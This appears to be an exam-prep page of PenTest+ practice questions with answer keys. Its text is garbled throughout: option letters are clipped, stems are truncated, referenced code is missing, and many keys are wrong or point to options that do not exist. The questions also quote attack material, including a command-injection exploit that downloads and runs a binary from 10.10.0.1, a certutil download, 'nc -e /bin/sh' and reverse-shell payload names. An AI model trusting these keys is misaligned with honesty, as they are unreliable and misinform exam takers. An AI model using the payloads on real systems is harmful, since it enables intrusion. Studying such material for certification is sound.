DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

CompTIA PT0-002 Exam Success: Mock Tests & Study Resources, CompTIA PenTest+ Certification | SPOTO

Prepare for success in your CompTIA PenTest+ (PT0-002) certification exam with our Mock Tests & Study Resources. The best way to prepare for the exam is by practicing the latest exam questions. Our study materials include practice tests, sample questions, exam dumps, and exam questions and answers, designed to help you achieve success. The CompTIA PenTest+ certification is ideal for cybersecurity professionals tasked with penetration testing and vulnerability management. With access to our mock exams and exam simulator, you can simulate real exam conditions and boost your confidence. Utilize our exam materials and exam answers to reinforce your understanding and readiness for the PT0-002 exam. Prepare with confidence and achieve exam success with our comprehensive study resources and mock tests.

Take other online exams
Question #1
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. capy
D. ping3
View answer
Correct Answer: C
Question #2
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
A. certutil –urlcache –split –f http://192
B. powershell (New-Object System
C. chtasks /query /fo LIST /v | find /I "Next Run Time:"
D. get http://192
View answer
Correct Answer: A
Question #3
A penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp touch –r .bash_history temp mv temp .bash_history Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. overing tracks by clearing the Bash history
D. aking decoy files on the system to confuse incident responders
View answer
Correct Answer: A
Question #4
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
A. nmap –f –sV –p80 192
B. nmap –sS –sL –p80 192
C. map –A –T4 –p80 192
D. map –O –v –p80 192
View answer
Correct Answer: A
Question #5
Given the following code: Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. utput encoding
D. ession tokens
E. Input validation
F. Base64 encoding
View answer
Correct Answer: BE
Question #6
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: (cid:127) The following request was intercepted going to the network device: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk (cid:127) Network management interfaces are availab
A. Enforce enhanced password complexity requirements
B. Disable or upgrade SSH daemon
C. isable HTTP/301 redirect configuration
D. reate an out-of-band network for management
E. Implement a better method for authentication
F. Eliminate network management and control interfaces
View answer
Correct Answer: CD
Question #7
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. Web archive
B. GitHub
C. File metadata
D. Underground forums
View answer
Correct Answer: A
Question #8
An executive needs to use Wi-Fi to connect to the company's server while traveling. Looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive MOST likely experiencing?
A. Data modification
B. Amplification
C. Captive portal
D. Evil twin
View answer
Correct Answer: D
Question #9
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: .Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing
B. Recommend using a password manager/vault instead of text files to store passwords securely
C. Recommend configuring password complexity rules in all the systems and applications
D. Document the unprotected file repository as a finding in the penetration-testing report
View answer
Correct Answer: D
Question #10
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
A. Send deauthentication frames to the stations
B. Perform jamming on all 2
C. et the malicious AP to broadcast within dynamic frequency selection channels
D. odify the malicious AP configuration to not use a pre-shared key
View answer
Correct Answer: B
Question #11
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?
A. The penetration tester was testing the wrong assets
B. The planning process failed to ensure all teams were notified
C. he client was not ready for the assessment to start
D. he penetration tester had incorrect contact information
View answer
Correct Answer: C
Question #12
Which of the following is the most common vulnerability associated with loT devices that are directly connected to the internet? IoT devices are often shipped with default passwords, which are easily discoverable and widely known. Many users fail to change these default credentials, leaving the devices vulnerable to unauthorized access. This issue is one of the most common vulnerabilities associated with IoT devices connected directly to the internet. Attackers can exploit these default passwords to gain co
A. nsupported operating systems
B. usceptibility to DDoS attacks
C. nability to network
D. he existence of default passwords
View answer
Correct Answer: D
Question #13
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
View answer
Correct Answer: D
Question #14
Which of the following expressions in Python increase a variable val by one (Choose two.)
A. al++
B. +val
C. al=(val+1)
D. +val
E. al=val++
F. val+=1
View answer
Correct Answer: C
Question #15
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. Buffer overflows
B. ross-site scripting
C. ace-condition attacks
D. ero-day attacks
E. Injection flaws
F. Ransomware attacks
View answer
Correct Answer: C
Question #16
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A. Create a one-shot systemd service to establish a reverse shell
B. Obtain /etc/shadow and brute force the root password
C. un the nc -e /bin/sh <
D. ove laterally to create a user account on LDAP
View answer
Correct Answer: B
Question #17
Which of the following best explains why communication is a vital phase of a penetration test? Communication is a vital phase of a penetration test to ensure all parties involved are aware of the test's progress, findings, and any potential impact on business operations. Discussing situational awareness involves sharing real-time insights about the security posture, any vulnerabilities found, and potential risks. This enables the organization to make informed decisions, mitigate risks promptly, and ensure t
A. o discuss situational awareness
B. o build rapport with the emergency contact
C. o explain the data destruction process
D. o ensure the likelihood of future assessments
View answer
Correct Answer: A
Question #18
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?
A. Cross-site request forgery
B. Server-side request forgery
C. Remote file inclusion
D. Local code inclusion
View answer
Correct Answer: B
Question #19
A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
A. nmap –oG list
B. nmap –sn 192
C. map –-open 192
D. map –o 192
View answer
Correct Answer: AC
Question #20
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. he risks defined in order of importance
D. web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
View answer
Correct Answer: D
Question #21
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW
B. Verify the client has granted network access to the hot site
C. etermine if the failover environment relies on resources not owned by the client
D. stablish communication and escalation procedures with the client
View answer
Correct Answer: A
Question #22
A penetration tester is reviewing the following SOW prior to engaging with a client: "Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behavior
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. ailing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
D. eeking help with the engagement in underground hacker forums by sharing the client's public IP address
E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
F. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
View answer
Correct Answer: CD
Question #23
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power
B. devices are obsolete and are no longer available for replacement
C. rotocols are more difficult to understand
D. evices may cause physical world effects
View answer
Correct Answer: D
Question #24
A penetration tester obtained the following results after scanning a web server using the dirb utility: ... GENERATED WORDS: 4612 ---- Scanning URL: http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200|SIZE:214) ... DOWNLOADED: 4612 – FOUND: 4 Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index
B. about C
View answer
Correct Answer: AC
Question #25
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: The following request was intercepted going to the network device:GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0)Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk Network management interfaces are available on the production n
A. Enforce enhanced password complexity requirements
B. Disable or upgrade SSH daemon
C. Disable HTTP/301 redirect configuration
D. Create an out-of-band network for management
E. Implement a better method for authentication
F. Eliminate network management and control interfaces
View answer
Correct Answer: AE
Question #26
A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?
A. ook for open ports
B. Listen for a reverse shell
C. ttempt to flood open ports
D. reate an encrypted tunnel
View answer
Correct Answer: A
Question #27
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
A. omma
B. Double dash
C. ingle quote
D. emicolon
View answer
Correct Answer: C
Question #28
A penetration tester managed to exploit a vulnerability using the following payload: IF (1=1) WAIT FOR DELAY '0:0:15' Which of the following actions would best mitigate this type ol attack? The payload used by the penetration tester is a type of blind SQL injection attack that delays the response of the database by 15 seconds if the condition is true. This can be used to extract information from the database by asking a series of true or false questions. To prevent this type of attack, the best practice is
A. ncrypting passwords
B. arameterizing queries
C. ncoding output
D. anitizing HTML
View answer
Correct Answer: B
Question #29
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
A. Open-source research
B. A ping sweep C
E. A vulnerability scan
F. An Nmap scan
View answer
Correct Answer: B
Question #30
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords C
View answer
Correct Answer: B
Question #31
Given the following output: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ During which of the following activities was this output MOST likely obtained?
A. Website scraping
B. Website cloning
C. omain enumeration
D. RL enumeration
View answer
Correct Answer: CF
Question #32
Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue? The best way to mitigate this issue is to implement patching and change control programs, which are processes that involve applying updates or fixes to software packages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software pa
A. mplementation of patching and change control programs
B. evision of client scripts used to perform system updates
C. emedial training for the client's systems administrators
D. efrainment from patching systems until quality assurance approves
View answer
Correct Answer: A
Question #33
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.) A.Wireshark
B. Nessus
C. etina
D. urp Suite
E. Shodan
F. Nikto
View answer
Correct Answer: AC
Question #34
Appending string values onto another string is called:
A. compilation
B. connection
C. oncatenation
D. onjunction
View answer
Correct Answer: A
Question #35
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
A. Implement a recurring cybersecurity awareness education program for all users
B. Implement multifactor authentication on all corporate applications
C. estrict employees from web navigation by defining a list of unapproved sites in the corporate proxy
D. mplement an email security gateway to block spam and malware from email communications
View answer
Correct Answer: A
Question #36
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} – c${IFS}'cd${IFS}/ tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I FS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post- engagement?
A. grep –v apache ~/
B. rm –rf /tmp/apache C
View answer
Correct Answer: D
Question #37
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
A. As backup in case the original documents are lost
B. To guide them through the building entrances
C. o validate the billing information with the client
D. s proof in case they are discovered
View answer
Correct Answer: A
Question #38
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. upervisors and controllers are on a separate virtual network by default
C. ontrollers will not validate the origin of commands
D. upervisory systems will detect a malicious injection of code/commands
View answer
Correct Answer: C
Question #39
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
A. Reach out to the primary point of contact
B. Try to take down the attackers
C. all law enforcement officials immediately
D. ollect the proper evidence and add to the final report
View answer
Correct Answer: CE
Question #40
A penetration tester is enumerating shares and receives the following output: Which of the following should the penetration tester enumerate next? The output displayed is typical of what one might see when using a tool like smbclient or enum4linux to list shared directories on a system that uses the SMB (Server Message Block) protocol. Here's a brief overview of the shared resources that have been found: 1. print$ - This share is generally used for printer drivers. 2. home - Could be a user's home director
A. ev
B. rint$
C. ome
D. otes
View answer
Correct Answer: A
Question #41
A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. inux
D. ndroid
View answer
Correct Answer: A
Question #42
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. SA
C. OW
D. OU
View answer
Correct Answer: C
Question #43
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
A. RFID cloning
B. RFID tagging
C. eta tagging
D. ag nesting
View answer
Correct Answer: D
Question #44
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
A. Dictionary
B. Directory
C. Symlink
D. Catalog
E. For-loop
View answer
Correct Answer: A
Question #45
The following PowerShell snippet was extracted from a log of an attacker machine:A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?
A. Line 8
B. Line 13
C. Line 19
D. Line 20
View answer
Correct Answer: A
Question #46
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)
A. The libraries may be vulnerable
B. The licensing of software is ambiguous C
E. The libraries may be unsupported
F. The libraries may break the application
View answer
Correct Answer: B
Question #47
A consultant is reviewing the following output after reports of intermittent connectivity issues: ? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet] ? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet] ? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet] ? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet] ? (224.0.0.251) at 01:02:5e:7
A. A device on the network has an IP address in the wrong subnet
B. A multicast session was initiated using the wrong multicast group
C. n ARP flooding attack is using the broadcast address to perform DDoS
D. device on the network has poisoned the ARP cache
View answer
Correct Answer: AE

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.